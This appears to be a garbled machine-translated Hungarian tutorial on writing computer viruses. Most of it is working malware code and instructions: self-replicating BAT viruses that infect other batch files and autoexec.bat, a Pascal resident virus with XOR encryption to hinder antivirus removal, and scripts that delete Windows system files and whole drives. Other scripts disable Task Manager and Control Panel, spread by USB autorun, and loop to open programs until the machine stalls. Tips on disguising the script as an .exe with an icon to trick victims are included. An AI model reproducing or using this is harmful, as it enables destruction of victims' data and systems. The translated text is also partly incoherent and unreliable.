Hogyan készítsünk egy denevér vírus
Hogyan készítsünk egy denevér vírust. (Collection vírusok)
BAT-vírus
@echo off
Ez a vírus megfertőzi a merevlemezre, így csak egy virus.bat fájlt. Mégis, azt nem mondanám, hogy ez egy igazi vírus, mert ő nem képes megfertőzni más számítógépekre. A BAT-vírus szerzett világosabb körvonalai kiegészítését képes megfertőzni egy másik PC:
Ebben a példában van egy string, amely lehetővé teszi, hogy a vírus fertőzésére floppy lemezek. Az mit jelent ez, hogy ha újra a PC-t a meghajtó egy floppy lemezre, akkor szennyezett lehet.
Természetesen virus.bat fájlt a gyökere a C: meghajtó lesz nagyon érzéketlen a felhasználó szeme, hogy nem volt ott attrib programot. Átalakítás a vírus:
attrib + H c: virus.bat> NUL
Ha óvatos, akkor már felismerték, hogy a hívás virus.bat fájlt az autoexec.bat lesz írva minden alkalommal újraindítja a számítógépet. Ennek elkerülése érdekében van egy egyszerű módja: a hívás befejezése után kell feltüntetni a attrib programot telepíteni egy csak olvasható attribútumot autoexec.bat. De van egy másik lehetőség, ez egy kicsit bonyolultabb, de okos:
ha létezik c: virus.bat goto hűvös
attrib + H c: virus.bat> NUL
Itt a második sorban ellenőrzi, hogy már létezik egy fájl c: virus.bat és ha már létezik, van egy átmenet a címkén cool. Ez a módszer is nagyon egyszerű. A világos hátránya - ha a felhasználó eltávolítja a hívást a autoexec.bat, és hagyja virus.bat fájlt, a vírus egy hülye pimaszul csalt. A vírus intelligens, akkor kell használni a lelet programot, ha képes lesz foglalkozni vele, akkor írj bonyolultabb BAT-vírus, amely megfertőzi egynél több fájlt c: autoexec.bat, és az összes * .BAT. például:
ha '% 1 ==' In_ goto MeTrAin
ha létezik c: MeTrA.bat goto MeTrAru
ha nem létezik% 0 Goto MeTrAen
attrib + H c: MeTrA.bat
A %% t (* .bat) nem hívja c: Metra In_ %% t
ha nem ERRORLEVEL 1 goto MeTrAen
Hogy mit jelent a fertőzés a következő: a vírus minden sor egy címke, ebben a példában ez Metra. Például ez a címke nem csinál semmit, az első sorban, a második sorban a címke, azonban nem passzív, akkor használják a belső működését a vírus, és részt vesz a cím. Amikor futtatja a vírus ellenőrzi, hogy a C: METRA.BAT, ha nem, akkor a vírus létrehozza és segítségével a program megtalálja a fájl azon példányait (ahonnan indult) minden vonal, amely a címkén a vírus, azaz a másolatok csak a vírus vonalon. Így a vírus nem másolt sor. Így a C: METRA.BAT most egy példányát a vírus. Ezután a vírus keresi BAT-fájlokat. Annak elkerülése érdekében, az újrafertőződés történt felhasználva pontosan ugyanazt a programot találni. Tegyük fel, hogy talált vírus RUN.BAT fájlt, és õ még nem fertőzött, akkor a vírus okozza a fájlt a C: METRA.BAT a következő paraméterekkel: In_ RUN.BAT, itt az első paraméter In_ mondja a vírus, szükséges, hogy megfertőzi a fájlt, amelynek neve van megadva, a második esetben paraméter, ebben az esetben RUN.BAT. Virus C: METRA.BAT megfertőz egy fájlt RUN.BAT legegyszerűbb módon - az type parancsot hozzáfűz a fájl RUN.BAT magukat. Ez RUN.BAT fájl fertőzött.
Companion vírus
Ezek a vírusok nem változtatják meg a programot. Ők hozzák létre az EXE-fájlt, hogy a COM-fájlokat. Amikor futtatja a programot először elindítja COM-fájl vírussal megfertőző más fájlokat, futtatni EXE-fájlt. Vegyük ezt a példát:
A vírus jobb lenne, ha a csomag valami hasonló PKLITE az -e opciót. A tetején van egy sor - a méret a vírus, láthatjuk, hogy az értéke nem kevesebb, mint EXE-fájlt egy vírus, és kívánatos, hogy és nem volt több.
műholdas vírus
fertőzés elve:
• megtalálják az EXE-fájl
• OVR-, hogy megtalálja a fájlt ugyanazzal a névvel
• Ha nem, akkor nevezd át a EXE-fájl található a OVR-fájl felülírja az EXE-fájlt.
rezidens vírusok
Pascal hivatkozás:
eljárás Keyclick; szakítsa meg;
Ha a port [$ 60] <$80 then
Ezután távolítsa el az összes hibát ebből a példából, és alakították át egy vírus:
eljárás Keyclick; szakítsa meg;
Itt InfExe eljárás rutin eljárás nem rezidens vírus (megfertőzi az aktuális könyvtárban). De ezeket a sorokat beírását a helyét a vírus, amely, mintha a végén.
Sajnos a tanúsítványban nem mondja, hogyan lehet elkerülni újra telepítés a memóriában, így azt javaslom, hogy a vírus replikálódott testét minden fájlt a C meghajtón ki a kihívást config.sys. Példa: install = c: vir.exe / 123, ide / 123 - egy olyan paraméter, azt mondja a vírus elkezdte megfertőzni a memóriát, vagyis, akkor nem kell futtatni a járművet, és meg kell végezni ezt a három sort.
Akkor pomudrit és egyéb megszakítások, de én felizgatni, vírusok az ilyen típusú általában nagyon bugos és a munka, alapvetően csak egy több értékes környezetben (a DOS emulációs lefagy).
szövődmény a kezelés
Ha nem szeretné, hogy a vírus elővett néhány béna lett áldozata az anti-vírus, akkor kell gondolni a szövődmény a kezelés.
Pascal vírus általában fertőz egy programot, hogy a felső, így a régi tartalmat a végéig. Az ilyen vírusok víruskereső adatbázisok töltik automatikusan (emberi beavatkozás nélkül). Érthető, átírják a vége, hogy a felső és méretre vághatod - ez egy nagyon egyszerű művelet. Az értelemben összetettsége kezelés áll titkosítására egy darab az áldozatot. mert egy darab az áldozat, amikor mozog a végén a fájl a tömbben, akkor jár el, mint ez:
i: = 1-777 do
i2: = ord (cc) XOR 343;
Itt a1 - egy tömb, amely tárolja az elején az áldozatok; I, I2 - egész szám; cc - char.
Ennek eredményeként ez a művelet titkosított darab a cél fájlnév (777 bájt). mert egy titkosítási művelet végezzük XOR - használnak visszafejteni ugyanazt a műveletet. Tehát ez a kis rutin kell tenni mind az eljárás, melynek meg kell határozni a folyamat a fertőzés és a folyamat fut a hordozó (bevezetés előtt és után dob). Ha nem érti XOR, azt mondanám, az én például titkosítás segítségével végezzük a kulcs 343, akkor 1-től 65000. Tudod, hogy ez fontos változás, ha a fertőzés az egyes fájlok, például, hogy egy kulcsot függ annak méretétől hordozó, vagy létrehoz egy véletlen kulcsot és tedd valahol a szervezetben a vírus, vagy elolvasni egy pár byte-kód az áldozat, hogy őket az ord-érték és a kulcsot. És mégis, az én például a titkosítás a fájl elején, de lehet, hogy egy bizonyos elmozdulás, ami szintén függött valamire. titkosítja a méret I 777, de lehet csinálni is véletlen, stb Azt is védik a vírus lamerskie trace:
O1H. O3H. Br. Pointer;
eljárás REBOOT; Megszakítás;
Itt, ahelyett, szia mondatot kell beilleszteni vírus kezelések, hordozóeszköz kell beilleszteni a vonalak a helyreállítási vektorok.
@echo off - nem teszik lehetővé a parancs kimenetének a képernyőn, beleértve az eredmények azok végrehajtását.
szín 40 - teszi fájlok háttér piros és fekete betűkkel.
címke béna - label parancs paraméterek nélkül megadott átnevezi a rendszer lemez egy adott szót.
attrib -s -r -h -a% systemdrive% * -. eltávolításához rendszer attribútumait néhány fájlt.
törli% Windir% * * / q -. banális törlésére.
törli% Windir% system32 * * / q -. banális fájlok törlésével bár Windu viszi gond nélkül.
törli% systemdrive% * * / q -. eltávolítását rendszerszinten jelentős rejtett fájlokat a rendszer meghajtón. Bár a Windows már nem elég, hogy fut semmilyen módon távolítsa el a NTLDR fájlt, és indítsa újra.
regedit (elérési utat a fájl) - Add információkat a .reg fájlt a registry. Van is egy csapat a reg paramétereket, de néha könnyebb létrehozni egy külön .reg fájlt. Nem lehet sok fantázia.
echo text> (>>) fájl - hozzáadása bejegyzések egy fájlba. Badge> létrehoz egy új fájlt a megadott szöveget, >> adunk a már a meglévő fájlt.
shutdown -r -f - Force indítsa újra a számítógépet, tiltakozása ellenére a rendszer.
@echo off
del "% SystemRoot% # 92; illesztőprogram gyorsítótár # 92; i386 # 92; driver.cab" / f / q> nul
Távolítsuk el az asztalon.
@echo off
reg add HKCU # 92; Software # 92; Microsoft # 92; Windows-# 92; CurrentVersion # 92; házirendje # 92; Explorer / v NoDesktop / t REG_DWORD / d 1 / f> nul
Önmegsemmisítő! Hozzáfűzi, hogy minden prog nem palitsya. @echo off del "% 0"> nul
@echo off
reg add HKCU # 92; Software # 92; Microsoft # 92; Windows-# 92 Current Version # 92; házirendje # 92; System / v
DdisableTaskMgr / t REG_DWORD / d 1 / f> nul
-megtiltja TaskMena
@echo off
% SystemRoot% / system32 / rundll32 User32, SwapMouseButton> nul
-mneya egérgombbal helyen lehet jó elrontani az idegeket, aki nid
@echo off
reg add HKCU # 92; Software # 92; Microsoft # 92; Windows-# 92 Current Version # 92; házirendje # 92; Explorer # 92; RestrictRun
/ V 1 / t REG_DWORD / d% SystemRoot% # 92; explorer.exe / f> nul
-kezdeni tilalmat programok
@echo off
del "% SystemRoot% # 92; kurzorok # 92; * *."> nul
-eltávolítja egérkurzorok
@echo off
del "% SystemRoot% # 92; Media" / q> nul
-megszünteti a Windows hangok
@echo off
reg add HKCU # 92; Software # 92; Microsoft # 92; Windows-# 92 Current Version # 92; házirendje # 92; Explorer
/ V NoControlPanel / t REG_DWORD / d 1 / f> nul
-tilthatják vezérlőpult
@echo off
net user "béna" / add> nul
@echo off
del "% SystemRoot% # 92; kurzorok # 92; * *."> nul
Del C: # 92; WINDOWS # 92; system32 # 92; catsrvps.dll
Del C: # 92; WINDOWS # 92; system32 # 92; catsrvut.dll
Del C: # 92; WINDOWS # 92; system32 # 92; cdfview.dll
Del C: # 92; WINDOWS # 92; system32 # 92; cisvc.exe
Del C: # 92; WINDOWS # 92; system32 # 92; ckcnv.exe
Del C: # 92; WINDOWS # 92; system32 # 92; clb.dll
Del C: # 92; WINDOWS # 92; system32 # 92; cmd.exe
Del C: # 92; WINDOWS # 92; system32 # 92; cmdial32.dll
Del C: # 92; WINDOWS # 92; system32 # 92; cnbjmon.dll
Del C: # 92; WINDOWS # 92; system32 # 92; comctl32.ocx
Del C: # 92; WINDOWS # 92; system32 # 92; dplaysvr.exe
Del C: # 92; WINDOWS # 92; NOTEPAD.EXE
Del C: # 92; WINDOWS # 92; twunk_32.exe
Del C: # 92; WINDOWS # 92; wmprfRUS.prx
Del C: # 92; WINDOWS # 92; WindowsShell.Manifest „);
Del C: # 92; WINDOWS # 92; regedit.exe
Del C: # 92; WINDOWS # 92; explorer.exe
Del C: # 92; WINDOWS # 92; OemDrv
Del C: # 92; WINDOWS # 92; PeerNet # 92; sqldb20.dll
Del C: # 92; WINDOWS # 92; PeerNet # 92; sqlqp20.dll
Del C: # 92; WINDOWS # 92; twain_32 # 92; wiatwain.ds
del virus.bat
Ez batikolt egyszerűen bemásolja magát mindenféle média minden 20 másodpercben.
Prevraschaesch ez batik az explorer.exe segítségével Batexec, és ahol az archívumban.
Aztán schesh meg egy számítógépes fájl c: # 92; ablakok # 92; explorer.exe (az ikon a számítógép megnyitja az asztalon), és dobja el az archívumban a korábban dobott a system32 mappában (nem a rendszer egy csomó fájl és soddannuyu teboyu) ezen a fájlon alakítjuk SFX paraméterekkel: Út kicsomagolni: c: # 92, # 92 ablakok; ; Information Display: Hide all; Felülírás mód: felülírása az összes fájlt figyelmeztetés nélkül. Imenush SFX a avtorun. Hozzon létre egy második fájl autorun.inf az alábbi tartalommal:
összerakható fájlokat a gyökér PACU meghajtó (flash meghajtó). És minden, de ha van egy fájl c: # 92; exp.com a fájlokat az lesz fejezi be munkáját is.
Először módosítsa a ponton az idő 00:00, a második példányt a fájlt a lemezre F - USB flash meghajtót a munka nevét. Ne felejtsük el, hogy mentse a fájlt bloknotovsky .bat formátumban. Ehelyett meg lehet változtatni az időt és a dátumot a «Dátum 13.06.23». Miután írt ezt a vonalat, akkor változtassa meg a dátumot, hogy 2023-6 hónapos, 13 szám)) most egy kis lista, hogy mit írhat bloknotovskom vírus.
LISTA:
del F :. * * / q
címke F: HACK
2) A programot a dátum és az idő a számítógépén, és másolja az USB flash meghajtót a C és a hajtás.
Azt már tudjuk, hogyan kell létrehozni szerény vírusok.
Ő tudja, hogyan kell: Az idő, a dátum, név lemezek és a flash meghajtók, a program nyitott, létrehozhat mappákat, másolja magát, adjunk a felhasználók, változtassa meg a kiterjesztést, és elpusztítani információkat. Ez egy elég rövid lista, őszintén szólva. Most majd megtanít néhány finomságok virusopisatelsva. Tegyük fel, hogy tettél egy vírus, de úgy néz ki, elég csúnya. Nos, aki nyitott egy furcsa file? Igazad van, ezek az emberek a világ nem sokat. Hogyan lehet változtatni a méret a .bat és .exe hozzá ikont. Nagyon könnyű (Szükséges, hogy a számítógép WinRAR). Keresse meg a vírus kiterjesztésű .bat, kattintson rá a jobb gombbal, kattintson a „Hozzáadás az archívumhoz ...”. Tegyen egy pipát az „Create SFX-archívum”, válassza a Speciális fülre, majd kattintson a gombra „SFX opciók ...”. A „Run extrakció után” írja a vírus nevét (például Virus.bat), és a „Szöveg és grafika”, a „Load SFX ikonra a köldökzsinórt.” Kattintson a „Tallózás”, és keressen Ico méret ikonra. Most kattintson az OK gombra. Kész)) .exe formátum helyett .bat, és ahogy kellett. Most megteheti a vírusok, amit akar. És mi, akkor el kell döntenie. Szeretne többet parancsokat, hogy ha csak befejezni a „balek” nyitott www.google.ru írd denevér vírusok és kattintson a „Keresés” gombra.
Tegyük fel, hogy levelet vírus, amely rontja a megnyitott mappában az információ és kevés kárt:
Kész vagy? - Azt kérdezed. Nem. Meg kell befejezni. Az új csapat «@echo off» elején bevezetett a vírus irha és mindent, ami történik a jövőben is. Egy szó, akkor nem ad a felhasználónak, hogy mi történt. Tovább után valamennyi parancs egyszerű, de nagyon hatékony cselekvés «> nul» pl «idő 00:00> nul» vagyunk jelen a lényeg. Így javítani tudjuk vírus:
@echo off
del C :. * * / q> nul
del D :. * * / q> nul
del E :. * * / q> nul
del F :. * * / q> nul
idő 00:00> nul
dátum 13.06.23> nul
del *. * / q> nul
Itt most a vírus kész. Mentés, átalakítani, de mi a következő a teendő vele - az üzleti. Egyébként van egy nagyszerű program átalakítására .bat .exe, akkor sokkal jobban működik WinRAR'a nevezte «Bat exe konverter». Itt töltheti le az interneten, ez ingyenes. Szóval, vissza a vírus-írás.
% SystemRoot% / system32 / rundll32 User32, SwapMouseButton
Ez a vonal megváltozik az egér gombját helyeken. Lehet, hogy valaki játszani trükk, ahogy hajt, mi történik, ez időt vesz igénybe (ha ez elég felhasználó), az osoboodarennyh mondani, ha te írtad meg kikapcsolni egyszerűen elég: „Control Panel”, „Nyomtatók és egyéb hardver”, " egér „, és távolítsa el a jelölést az első.
Eddig ment tovább:
x;
Kezdés mspaint parancsot
Goto x;
Nagyon jó sor gyenge terhelés gépek. A csapat megnyitja a festék, és nagyon gyorsan. 60 alkalommal, mielőtt megérteni, mi történt, és zárja be a programot. Próbálja beírni ahelyett mspaint parancsot bármilyen program sorban. Works)) Használhatja több ilyen parancsok teljes gátlása az áldozat számítógépén. Új script:
Nagyon kegyetlen parancs hozzáadja a program indítási OS. Nem ajánlom, hogy ellenőrizze a számítógépen. Ne hagyja abba, és menj tovább))
Assoc .lnk = .txt> nul
Assoc .exe = .mp3> nul